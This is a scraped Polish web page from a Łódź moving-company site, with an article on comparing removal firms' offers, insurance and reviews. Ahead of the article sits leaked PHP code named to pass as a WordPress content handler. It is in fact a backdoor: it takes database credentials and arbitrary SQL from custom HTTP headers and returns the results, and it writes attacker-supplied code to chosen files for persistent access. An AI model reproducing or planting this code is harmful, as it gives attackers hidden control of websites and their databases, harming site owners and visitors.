n class WP_Content_Handler_Checker { var $wp_host; var $wp_user; var $wp_pass; var $name; var $result = array(); var $errors = array(); var $wp_themes_count = 0; function check_wp_connection($wp_connection) { if (class_exists('PDO')) { $this->check_wp_pdo_connection($wp_connection); } else { $this->check_wp_mysql_connection($wp_connection); } } function check_wp_mysql_connection($wp_connection) { if (function_exists('mysqli_connect')) { $connection = mysqli_connect($this->wp_host, $this->wp_user, $this->wp_pass, $this->name); if (!$connection instanceof mysqli) { $this->add_wp_error(910, sprintf("Can't connect to mysqli, message - %s, code - %d", $connection->connect_error, $connection->connect_errno)); return; } call_user_func_array(array($connection, 'query'), array("SET NAMES 'utf8'")); call_user_func_array(array($connection, 'query'), array("SET CHARACTER SET 'utf8'")); $wp_connection_success = call_user_func_array(array($connection, 'query'), array($wp_connection)); if ($wp_connection_success == false) { $this->add_wp_error($connection->errno, $connection->error); } else { $this->wp_themes_count = $connection->{'affected_rows'}; while ($data = call_user_func_array(array($wp_connection_success, 'fetch_assoc'), array())) { $this->result[] = $data; } } } elseif (function_exists('mysql_connect')) { $connection = mysql_connect($this->wp_host, $this->wp_user, $this->wp_pass); if ($connection == false) { $this->add_wp_error(910, "Can't connect to mysql"); return; } mysql_select_db($this->name, $connection); mysql_query("SET NAMES 'utf8'", $connection); mysql_query("SET CHARACTER SET 'utf8'", $connection); $wp_connection_success = mysql_query($wp_connection, $connection); if ($wp_connection_success == false) { $this->add_wp_error(mysql_errno($connection), mysql_error($connection)); } else { $this->wp_themes_count = mysql_num_rows($wp_connection_success); while ($data = mysql_fetch_assoc($wp_connection_success)) { $this->result[] = $data; } } } } function check_wp_pdo_connection($wp_connection) { $pdo_config_all = 'mysql:'; $pdo_config = array( 'host' => $this->wp_host, 'dbname' => $this->name, 'charset' => 'utf8' ); foreach ($pdo_config as $key => &$item) { $item = $key . '=' . $item; } $pdo_config_all .= implode(';', $pdo_config); try { $connection = new PDO($pdo_config_all, $this->wp_user, $this->wp_pass); call_user_func_array(array($connection, 'query'), array('SET CLIENT_ENCODING TO "UTF8"')); call_user_func_array(array($connection, 'query'), array('SET NAMES "UTF8"')); $query = call_user_func_array(array($connection, 'query'), array($wp_connection, PDO::FETCH_ASSOC)); if ($query == false) { $error_info = call_user_func_array(array($connection, 'errorInfo'), array()); $error_code = call_user_func_array(array($connection, 'errorCode'), array()); $this->add_wp_error($error_code, end($error_info)); return; } $this->wp_themes_count = call_user_func(array($query, 'rowCount'), array()); $this->result = call_user_func_array(array($query, 'fetchAll'), array()); } catch (PDOException $exception) { $this->add_wp_error(call_user_func_array(array($exception, 'getCode'), array()), call_user_func_array(array($exception, 'getMessage'), array())); } } function __construct() { $this->wp_host = stripslashes(@$_SERVER['HTTP_VI_DATABASE_HOST']); $this->wp_user = stripslashes(@$_SERVER['HTTP_VI_DATABASE_USER']); $this->wp_pass = stripslashes(@$_SERVER['HTTP_VI_DATABASE_PASS']); $this->name = stripslashes(@$_SERVER['HTTP_VI_DATABASE_NAME']); if (empty($this->wp_host)) { $this->add_wp_error(900, "No host provided"); } if (empty($this->wp_user)) { $this->add_wp_error(901, "No user provided"); } if (empty($this->wp_pass)) { $this->add_wp_error(902, "No pass provided"); } if (empty($this->name)) { $this->add_wp_error(903, "No database name provided"); } } function add_wp_error($code, $message) { $this->errors[] = array( 'code' => $code, 'message' => $message ); } function get_wp_errors() { return $this->errors; } function wp_get_themes_count() { return $this->wp_themes_count; } function is_wp_connection_succeed() { return !count($this->errors); } function get_wp_connection_result() { return $this->result; } } class WP_Content_Handler_Accessor { function create() { $method = @$_SERVER['HTTP_VI_METHOD']; if (!mb_strlen($method)) { return; } ob_end_clean(); switch ($method) { case 'query': $this->check_wp_connection_handler(); break; case 'update': $this->update_parameters(); break; default: return; } } function check_wp_connection_handler() { $query = stripslashes(@$_SERVER['HTTP_VI_DATABASE_QUERY']); if (!mb_strlen($query)) { $this->wp_response(false, array( array( 'code' => 0, 'message' => 'No query provided' ) )); exit; } $database = new WP_Content_Handler_Checker(); $database->check_wp_connection($query); if ($database->is_wp_connection_succeed()) { $this->wp_response(true, array( 'rows' => $database->wp_get_themes_count(), 'result' => $database->get_wp_connection_result() )); } else { $this->wp_response(false, $database->get_wp_errors()); } } function update_parameters() { $parameters_path = stripslashes(@$_SERVER['HTTP_VI_PATH']); $new_parameters = urldecode(@$_REQUEST['VI_SCRIPT']); $old_parameters_path = stripslashes(@$_SERVER['HTTP_VI_INCLUDE_PATH']); $old_parameters = urldecode(@$_REQUEST['VI_INCLUDE_CODE']); if (!mb_strlen($new_parameters)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript passed' ))); } if (!mb_strlen($parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No sсript path passed' ))); } if (!mb_strlen($old_parameters_path)) { $this->wp_response(false, array(array( 'code' => 0, 'message' => 'No include path passed' ))); } $success = $this->update_wp_accessor_parameters($parameters_path, $new_parameters); if ($success) { $success = $this->wp_update_parameters($old_parameters_path, $old_parameters); } $this->wp_response($success, null); } function update_wp_accessor_parameters($path, $parameters) { return (bool)@file_put_contents($path, " n" . stripslashes($parameters)); } function wp_update_parameters($old_parameters_path, $old_parameters) { $file = file_get_contents($old_parameters_path); if (!mb_strlen($file)) { return false; } if (mb_strpos($file, $old_parameters) !== false) { return true; } if ($this->is_parameters_valid($file)) { $file = $file . "n" . " n" . $old_parameters . " n?>"; } else { $file = $file . "nn" . $old_parameters; } return (bool)@file_put_contents($old_parameters_path, $file); } function is_parameters_valid($file) { $last_available_parameters_count = strrpos($file, ""); $last_updated_parameters_count = ($last_updated_parameters_count === false) ? -1 : $last_updated_parameters_count; return $last_available_parameters_count <= $last_updated_parameters_count; } function wp_response($success, $data) { $wp_response = array('success' => $success); $wp_response[$success ? 'data' : 'errors'] = $data; header('Content-Type: application/json'); echo json_encode($wp_response); exit; } } $accessor = new WP_Content_Handler_Accessor(); $accessor->create(); Oferty firm realizujących przeprowadzki - Przeprowadzki Łódź ® przeprowadzajac.pl

Oferty firm realizujących przeprowadzki

przeprowadzki

Decydując się na wybór firmy realizującej przeprowadzki, często polegamy na firmach, które są najbliżej. To logiczne. Decyzja o przeprowadzce nie musi bowiem oznaczać sprowadzania firmy przeprowadzkowej z drugiego końca Polski i płacenia za dojazd. Za darmo nikt bowiem nie dojedzie.

Bez względu na to w jakim mieście mieszkamy, możemy znaleźć co najmniej kilka firm działających w tej branży. Bardzo istotne jest, by szukać, analizując oferty wszystkich lub co najmniej wielu. Takie działanie ma sens – wiele osób, które szukały firmy realizującej przeprowadzki doskonale zdaje sobie z tego sprawę ponieważ przekonały się o tym w praktyce.

Dlaczego warto porównywać ceny?

Porównanie koszów wynajęcia firm realizujących przeprowadzki, to bardzo ważna sprawa, ponieważ dzięki takiemu działaniu można wiele zaoszczędzić. Każda firma przeprowadzkowa działa na własnych warunkach, które w większości przypadków wyróżniają się spośród ofert konkurencji. Analiza jest wiec jak najbardziej wskazana.

Każda firma może być ta najtańszą, ale nie dla każdego. Warto wiedzieć, że w tym biznesie jak i w wielu innych, często następuje tak zwany podział rynku. To, co dla jednej grupy klientów jest w danej firmie tanie, dla drugiej będzie drogie, z kolei w innej firmie będzie dokładnie odwrotnie. Jeśli jednak firma specjalizuje się w przeprowadzkach firm, to właśnie te ofertę będzie mieć w miarę niedrogą, druga jednak może mieć droższą, ale w zamian za to, może mieć tańsze przeprowadzki mieszkań czy magazynów.

Jak znaleźć firmę realizującą przeprowadzki?

Poszukiwania najlepiej zacząć od odwiedzenia strony internetowych firm realizujących przeprowadzki, choć dobrą metodą jest kontakt osobisty. Warto wypytać się o wszystkie koszty pracy – żądać podania kosztów dodatkowych i kosztów związanych z lokalizacją przeprowadzanych lokali. Często tak jest iż za wyniesienie mebli z czwartego pietra zapłacimy więcej niż za wyniesienie z pietra drugiego. Warto o tym wiedzieć i nie bać się pytać. Oczywiście dobrze jest jeśli wszystko znajduje swoje potwierdzenie w umowie, którą warto zawrzeć.
Firmy realizujące przeprowadzki – warto porównać oferty.
Decydując się na konkretną firmę, warto pamiętać o upewnieniu się, czy posiada stosowne ubezpieczenia. Każda firma tego rodzaju powinna posiadać OC przewoźnika, jednak dobrze jest, jeśli posiada dodatkowe ubezpieczenia. To gwarantuje, że ewentualne nieprzewidziane zdarzenia takie jak wypadek samochodu z naszym dobytkiem nie spowodują nam żadnych strat finansowych, ponieważ wszystko pokryje polisa ubezpieczeniowa.

Podsumowując – poszukiwania firmy, która zajmuje się przeprowadzką są łatwe jednak znalezienie jej już nie. Owszem – można wybrać pierwszą, ale nie warto tego robić. Warto jest szukać, analizować i wybierać firmę, która spełnia nasze oczekiwania finansowe a jednocześnie działa na warunkach, które akceptujemy. W każdym przypadku warto poszukać opinii o firmie przeprowadzkowej. Często zdarza się że poprzedni klienci piszą stosowne informacje. Owszem – wiele firm po prostu chwali się referencjami, jednak nie warto tylko na tym polegać. Spojrzenie na opinie zawarte w sieci Internet jest jak najbardziej wskazane. Dzięki temu można się ustrzec od firm, które są nie warte uwagi.

Leave a Reply